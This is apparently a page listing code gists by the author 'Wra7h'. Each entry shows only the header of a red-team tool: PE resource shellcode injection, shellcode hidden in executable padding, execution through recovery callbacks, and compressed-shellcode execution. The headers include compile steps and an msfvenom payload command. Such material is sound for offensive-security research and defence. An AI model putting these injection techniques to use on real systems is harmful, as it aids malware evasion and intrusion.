Wra7h

% Wra7h/FlavorTown
% MATLAB version: R2023a
% Tested on Win10 x64

if not(libisloaded('kernel32'))
    loadlibrary('kernel32.dll', @kernel32proto);
end

if not(libisloaded('msvcrt'))
    loadlibrary('msvcrt.dll', @msvcrtproto);

Wra7h

/*
 * PEResourceInject (C# version for x64) by Wra7h
 * 
 * Add a bitmap resource to an executable. Parse the PE header and calculate the address of the shellcode.
 * This avoids direct calls to VirtualAllocEx & WriteProcessMemory, but will modify the target exe on disk,
 * and this implementation will create a backup of the executable in the same directory with a ".bak" extension.
 * 
 * Compile: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe .\PEResourceInject.cs
 * Use: PEResourceInject.exe <C:\Path\to\target\program.exe> <C:\Path\to\shellcode.bin>
 * 

Wra7h

function Get-ProcessPipes{
    param(
        [Parameter(Mandatory=$false)]
        [string]$CSV,
        [Parameter(Mandatory=$false)]
        [switch]$All
    )

    Add-Type -TypeDefinition  @"
        using System;

Wra7h

// Scan for any Application Recovery Callbacks on your system. Each Process ID/Callback address combination should only be displayed once.
// Also, it's a continuous loop so it shouldn't die until you're done with it.
// Full PoC here: https://github.com/Wra7h/ARCInject

// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe .\ARC_Scan.cs
// Execute: .\ARC_Scan.exe 

using System;
using System.Collections.Generic;
using System.Diagnostics;

Wra7h

// IMPORTANT NOTE:
// It seems like when this is compiled with C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, the crash is handled more gracefully than v3.5.
// So you'll have to find another way to cause an _unexpected_ crash to use with v4.0.30319.
//Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe .\RecoveryCallbackToShellcode.cs
//Usage: .\RecoveryCallbackToShellcode.exe <path to shellcode>

using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;

Wra7h

// Some fun with storing shellcode in the padding of executables, rebuilding the shellcode and executing if successfully recovered.
// At least on the executables I've used, the shellcode doesn't seem to prevent the executable from executing as expected. 

// Step 1: Compile:
//         PS C:\> C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\BrainPain.cs

// Step 2: generate shellcode
//         msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o calc.bin

// Step 3: Execute Brainpain

Wra7h

//Decompressing shellcode and execution via callback
//Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\DecompressExecute.cs
//Windows Compression API: https://docs.microsoft.com/en-us/windows/win32/api/_cmpapi/
//Supported Algorithms: https://docs.microsoft.com/en-us/windows/win32/api/compressapi/nf-compressapi-createcompressor

// Step 1: generate shellcode
//         Msfvenom: msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o calc.bin

// Step 2: Compress the shellcode with my compress.cs gist here: https://gist.github.com/Wra7h/4d56791c2d0b5c1f27a67f3bc0ab924d
//         Compression command: .\compress.exe -in C:\path\to\calc.bin -out .\LZMScalc.bin -alg 5

Wra7h

//Compresses a file using the Windows API
//Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\Compress.cs
//Windows Compression API: https://docs.microsoft.com/en-us/windows/win32/api/_cmpapi/
//Supported Algorithms: https://docs.microsoft.com/en-us/windows/win32/api/compressapi/nf-compressapi-createcompressor

// Takes a file, compresses it using one of the supported algorithms and creates a file with the compressed data.

using System;
using System.IO;
using System.Linq;